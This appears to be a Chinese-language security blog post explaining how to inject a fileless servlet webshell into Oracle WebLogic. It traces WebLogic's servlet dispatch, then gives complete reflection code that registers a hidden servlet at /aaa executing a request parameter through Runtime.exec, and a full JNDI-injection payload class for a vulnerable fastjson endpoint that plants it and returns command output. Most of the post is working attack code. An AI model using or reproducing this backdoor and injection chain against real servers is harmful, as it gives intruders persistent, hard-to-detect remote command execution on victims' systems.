Weblogic下的servlet記憶體馬注入-無參照純除錯

bitterz發表於2021-07-04

前面一段時間學習Tomcat下注入記憶體馬和spring下的記憶體馬,之後又實現了Resin下的記憶體馬,但Resin下的servlet和filter記憶體馬都要依靠defineClass,這就需要編譯java檔案以及base64編碼操作,覺得還是有點麻煩,Resin下最好用的當然還是listener記憶體馬,直接寫在一個執行的java檔案裡面就可以,方便又舒服。

扯皮完了,其實前面學習的記憶體馬實現都參考了前輩們的文章,所以突發奇想,為什麼不試試在不依賴其它文章的情況下,自己除錯並製作記憶體馬呢,所以開始行動?

1、尋找servlet注入方法

1.1 除錯

在IDEA中準備好Weblogic的環境,再寫個servlet,打個斷點,開始除錯

寫好的servlet類是com.bitterz.servlet.TestServlet,獲取到呼叫鏈如下:

doGet:22, TestServlet (com.bitterz.servlet)
service:731, HttpServlet (javax.servlet.http)
service:844, HttpServlet (javax.servlet.http)
run:280, StubSecurityHelper$ServletServiceAction (weblogic.servlet.internal)
run:254, StubSecurityHelper$ServletServiceAction (weblogic.servlet.internal)
invokeServlet:136, StubSecurityHelper (weblogic.servlet.internal)
execute:346, ServletStubImpl (weblogic.servlet.internal)
execute:243, ServletStubImpl (weblogic.servlet.internal)
wrapRun:3432, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
run:3402, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
doAs:321, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:120, SecurityManager (weblogic.security.service)
run:57, WlsSubjectHandle (weblogic.servlet.provider)
doSecuredExecute:2285, WebAppServletContext (weblogic.servlet.internal)
securedExecute:2201, WebAppServletContext (weblogic.servlet.internal)
execute:2179, WebAppServletContext (weblogic.servlet.internal)
run:1572, ServletRequestImpl (weblogic.servlet.internal)
run:255, ContainerSupportProviderImpl$WlsRequestExecutor (weblogic.servlet.provider)
execute:311, ExecuteThread (weblogic.work)
run:263, ExecuteThread (weblogic.work)

一步一步往下找,看看weblogic是如何根據URL找到對應servlet的,跟著呼叫鏈一直看,可以發現定義的TestServlet其實包裝在ServletStubImpl類中的:

繼續跟著呼叫鏈向下推,在wrapRun:3432, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)中可以看到,前面提到的ServletStubIpml類其實是ServletInvocationAction這個內部類的成員物件,成員名為stub,那就需要看看ServletInvocationAction是如何被建立的,或者其中的stub屬性是不是在呼叫鏈中新增的

繼續向下檢視,會發現ServletInvocationAction這個內部類的例項被命名為action,並一路被當作引數傳遞,直到doSecuredExecute:2285, WebAppServletContext (weblogic.servlet.internal)可以看到action被建立,並且傳入了requestFacade.getServletStub(req)的執行結果,斷點打在這一行,以便跟進到getServletStub方法中。

再次進入除錯模式,並跟進到getServletStub中,可以看到如下程式碼,用除錯模式下的程式碼執行工具執行一下ServletRequestImpl.getOriginalRequest(req)

可以看到返回結果是ServletRequstImpl類的例項,再看一下它的getServletStub方法:

public ServletStubImpl getServletStub() {
        return this.sstub;
    }

也就是說ServletRequstImpl類的例項物件的sstub成員物件就是ServletStubImpl例項物件(其中包裝了真正被執行的TestServlet物件)。意味著需要看看ServletRequestImpl物件是如何被建立的,或者其sstub屬性是何時新增的,這個物件在呼叫鏈中一直被命名為req,並不斷做為引數傳遞,直到呼叫鏈的run:1572, ServletRequestImpl (weblogic.servlet.internal)這一行

首先this代表的就是ServletRequestImpl物件,然後標記處1,通過this.context.getIndexServletStub方法獲取了一個ServletStubImple物件,再看標記2處通過setServletStub方法設定了屬性。

分別看看兩處呼叫的方法,先跟進標記2處的程式碼,如下

void setServletStub(ServletStubImpl stub) {
        this.sstub = stub;
    }
// this代表ServletRequestImpl物件

破案了!ServletRequestImpl中的sstub屬性是在這裡設定的。現在就需要看看傳入的stub引數,也就是上圖中的servletStub是如何得到的,所以跟進一下上圖中標記1處的getIndexServletStub方法,這裡其實又一個坑,要除錯跟進getIndexServletStub方法,必須重新打斷點,並且重啟weblogic訪問預設頁面,以為this.checkIndexFile只有在這時才為true。

由於getIndexServletStub方法的程式碼比較長,所以簡化如下

    ServletStubImpl getIndexServletStub(String URI, ServletRequestImpl req, ServletRequest wrapper) {
        String indexURI = this.findIndexFile(URI);
        if (indexURI == null) {
            // 由於uri為null,所以返回null
            return null;
        } 
        else if (xxx) {
            ....
            // 一長串的判斷之後返回null
            return null;}
        else {
            req.initFromRequestURI(this.prependContextPath(indexURI));
            ServletStubImpl servletStub = this.resolveDirectRequest(req);
            if (servletStub.getClassName().equals("weblogic.servlet.proxy.HttpProxyServlet") || servletStub.getClassName().equals("weblogic.servlet.proxy.HttpClusterServlet")) {
                req.initFromRequestURI(this.prependContextPath(URI));
                servletStub = this.resolveDirectRequest(req);
            }

            return servletStub;
        }
    }

if和else if中放回值都是null,所以不用看,重點看else下面的程式碼塊。servletStub的獲取程式碼為ServletStubImpl servletStub = this.resolveDirectRequest(req),因此跟進resolveDirectRequest方法,其程式碼如下

可以看出來,返回值sstub是從URLMatchHelper中獲取的,所以需要進一步跟進this.resolveRequest方法,程式碼較長,不方便截圖,簡化如下:

 private URLMatchHelper resolveRequest(String relUri) {
        if (DEBUG_URL_RES.isDebugEnabled()) {
            xxxxx
        }

        URLMatchHelper umh = (URLMatchHelper)this.servletMapping.get(relUri);
        if (umh == null) {
            xxxxx
        }

        if (umh == null) {
            xxxxx
        }

        return umh;
    }

this為WebAppServletContext,即weblogic實現的servletContext,重點程式碼在於this.servletMapping.get(relUri),通過uri從servletMapping中匹配到合適的servlet,處理瀏覽器的請求。至此servlet在weblogic中的呼叫鏈就理順了,其根本在於,需要在servletContext的servletMapping中有於uri相匹配的servlet,當然這裡實際上是servlet的多層包裝,包裝順序如下。

URLMatchHelper urlMatchHelper = servletcontext.servletMapping.get(uri);
ServletStubIpml servletStub = urlMatchHelper.getServletStub();
ServletRequestImple.sstub = servletStub;
ServletInvocationAction.stub = servletStub;
//呼叫順序如下
ServletInvocationAction.stub.HttpServlet->service->doGet

這裡除錯完後,跟著呼叫鏈繼續向下推,發現訪問/test,在ServletRequestImpl物件建立時,ServletStub就已經建立好了,具體原因沒有搞清除

1.2 servletMapping新增servlet

除錯完畢後,可以直到,只需要在servletMapping中新增URI和對應的URLMatchHelper物件即可,這裡通過反射即可實現。

// 建立servlet
HttpServlet httpServlet = new HttpServlet() {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String cmd = req.getParameter("cmd");
        if (cmd != null){java.lang.Runtime.getRuntime().exec(cmd);}
        return;
    }
};

String URI = "/aaa";
// 獲取servletContext
weblogic.servlet.internal.WebAppServletContext servletContext = (WebAppServletContext) req.getServletContext();

try {
    // 獲取servletMapping
    Method getServletMapping = servletContext.getClass().getDeclaredMethod("getServletMapping");
    getServletMapping.setAccessible(true);
    ServletMapping mappings = (ServletMapping) getServletMapping.invoke(servletContext);

    // 使用ServletStub包裝HttpServlet
    Constructor<?> ServletStubImplConstructor = Class.forName("weblogic.servlet.internal.ServletStubImpl").getDeclaredConstructor(String.class, Servlet.class, WebAppServletContext.class);
    ServletStubImplConstructor.setAccessible(true);
    ServletStubImpl servletStub = (ServletStubImpl) ServletStubImplConstructor.newInstance(URI, httpServlet, servletContext);

    // 使用URLMathchHelper包裝ServletStub
    Constructor<?> URLMatchHelperConstructor = Class.forName("weblogic.servlet.internal.URLMatchHelper").getDeclaredConstructor(String.class, ServletStubImpl.class);
    URLMatchHelperConstructor.setAccessible(true);
    Object umh = URLMatchHelperConstructor.newInstance(URI, servletStub);

    // 新增到ServletMapping中,即代表注入servlet記憶體馬成功
    if (mappings.get(URI) == null){
        mappings.put(URI, umh);
    }
          
        } catch (NoSuchMethodException | InvocationTargetException | IllegalAccessException | ClassNotFoundException | InstantiationException e) {
            e.printStackTrace();
        }

注入成功:

2、獲取request

2.1 從當前執行緒尋找資訊

前面的工作已經顯示,注入servlet成功了,但注入的基石在於已經擁有了HttpServletRequest物件,通過這個物件獲取servletContext,在進一步在servletMapping中新增記憶體馬。

那重點回到了如何獲取request物件,如果能夠向伺服器寫入或者上傳一個jsp檔案,那當然不需要自己想辦法獲取request物件,因為jsp檔案被中介軟體編譯為java檔案時,會自動新增request等物件。在反序列化或者jndi注入等條件下,只能手動獲取request,從以往在tomcat中獲取request的經驗,當前執行緒中有可能儲存著request物件,在剛剛除錯的呼叫鏈中,直接拉到最下面幾個點,看到如下內容

可見從ExecuteThread中,可以一步一步獲取request物件,進而獲取servletContext,那麼ExecuteThread怎麼獲取呢,這個物件實際上就是當前執行緒!

顯然先用Thread.currentThread()方法獲取當前執行緒吼,再通過幾次反射就就可以獲取request物件了,程式碼如下

// 獲取當前執行緒
Thread threadLocal = Thread.currentThread();
// 獲取workEntry即WlsRequestExecutor這個內部類
Field workEntry = threadLocal.getClass().getDeclaredField("workEntry");
workEntry.setAccessible(true);
weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor wlsRequestExecutor = (ContainerSupportProviderImpl.WlsRequestExecutor) workEntry.get(threadLocal);

// 獲取connectionHandler屬性
Field field = wlsRequestExecutor.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
weblogic.servlet.internal.HttpConnectionHandler connectionHandler = (HttpConnectionHandler) field.get(wlsRequestExecutor);

// 獲取request
ServletRequestImpl servletRequest = connectionHandler.getServletRequest();

// 獲取servlet
weblogic.servlet.internal.WebAppServletContext servletContext = (WebAppServletContext) servletRequest.getServletContext();

到這一步,再跟前面注入servletMapping的程式碼合併在一起,就可以在能夠執行java程式碼的情況下,注入weblogic的servlet了,下面來個示例

2.2 JNDI注入到記憶體馬注入

環境:

  • weblogic 12.1.3.0.0
  • fastjson 1.2.24
  • java 1.8u40

後端servlet程式碼

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
    System.getProperties().setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
    System.getProperties().setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
    JSON.parseObject(req.getParameter("json"));
}

jndi注入端程式碼,由於用到了weblogic相關的包,編譯時要不用maven依賴,要不用IDEA新增weblogic的包

import weblogic.servlet.internal.HttpConnectionHandler;
import weblogic.servlet.internal.ServletRequestImpl;
import weblogic.servlet.internal.ServletStubImpl;
import weblogic.servlet.internal.WebAppServletContext;
import weblogic.servlet.provider.ContainerSupportProviderImpl;
import weblogic.servlet.utils.ServletMapping;;
import javax.servlet.Servlet;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class InjectWeblogicServlet extends HttpServlet {
    private final String URI = "/aaa";
    private final String PWD = "cmd";
    public InjectWeblogicServlet(){
        HttpServlet httpServlet = new InjectWeblogicServlet("xxx");
        try {
            // 獲取當前執行緒
            Thread threadLocal = Thread.currentThread();
            // 獲取workEntry即WlsRequestExecutor這個內部類
            Field workEntry = threadLocal.getClass().getDeclaredField("workEntry");
            workEntry.setAccessible(true);
            weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor wlsRequestExecutor = (ContainerSupportProviderImpl.WlsRequestExecutor) workEntry.get(threadLocal);

            // 獲取connectionHandler屬性
            Field field = wlsRequestExecutor.getClass().getDeclaredField("connectionHandler");
            field.setAccessible(true);
            weblogic.servlet.internal.HttpConnectionHandler connectionHandler = (HttpConnectionHandler) field.get(wlsRequestExecutor);

            // 獲取request
            ServletRequestImpl servletRequest = connectionHandler.getServletRequest();

            // 獲取servlet
            weblogic.servlet.internal.WebAppServletContext servletContext = (WebAppServletContext) servletRequest.getServletContext();

            // 獲取servletMapping
            Method getServletMapping = servletContext.getClass().getDeclaredMethod("getServletMapping");
            getServletMapping.setAccessible(true);
            ServletMapping mappings = (ServletMapping) getServletMapping.invoke(servletContext);

            // 建立ServletStub
            Constructor<?> ServletStubImplConstructor = Class.forName("weblogic.servlet.internal.ServletStubImpl").getDeclaredConstructor(String.class, Servlet.class, WebAppServletContext.class);
            ServletStubImplConstructor.setAccessible(true);
            ServletStubImpl servletStub = (ServletStubImpl) ServletStubImplConstructor.newInstance(this.URI, httpServlet, servletContext);

            // 建立
            Constructor<?> URLMatchHelperConstructor = Class.forName("weblogic.servlet.internal.URLMatchHelper").getDeclaredConstructor(String.class, ServletStubImpl.class);
            URLMatchHelperConstructor.setAccessible(true);
            Object umh = URLMatchHelperConstructor.newInstance(this.URI, servletStub);

            if (mappings.get(this.URI) == null){
                mappings.put(this.URI, umh);
            }


        } catch (NoSuchMethodException | InvocationTargetException | IllegalAccessException | ClassNotFoundException | InstantiationException | NoSuchFieldException e) {
            e.printStackTrace();
        }
    }

    public InjectWeblogicServlet(String aaa){}

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String pwd = req.getParameter(this.PWD);
        if (pwd != null){
            Process process = Runtime.getRuntime().exec(pwd);
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(process.getInputStream(), "GBK"));
            String a;
            PrintWriter out = resp.getWriter();
            while ((a=bufferedReader.readLine()) != null){
                out.write(a);
            }
            out.flush();
            out.close();
            process.destroy();
        }
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        this.doGet(req, resp);
    }
}

最後來個實際效果圖

已經新增成功了,訪問注入的url再執行一下命令cmd /c whoami

3、關於filter和listener

filter的新增主要依靠servletContext.filterManager.registerFilter方法,其實看一下filterManager中的getFilterChain函式就知道weblogic中是如何儲存和管理filter的。

listener直接用servletContext.addListener即可,網上的教程很多,除錯過了,原始碼也看過了,就不重複造輪子了。

相關文章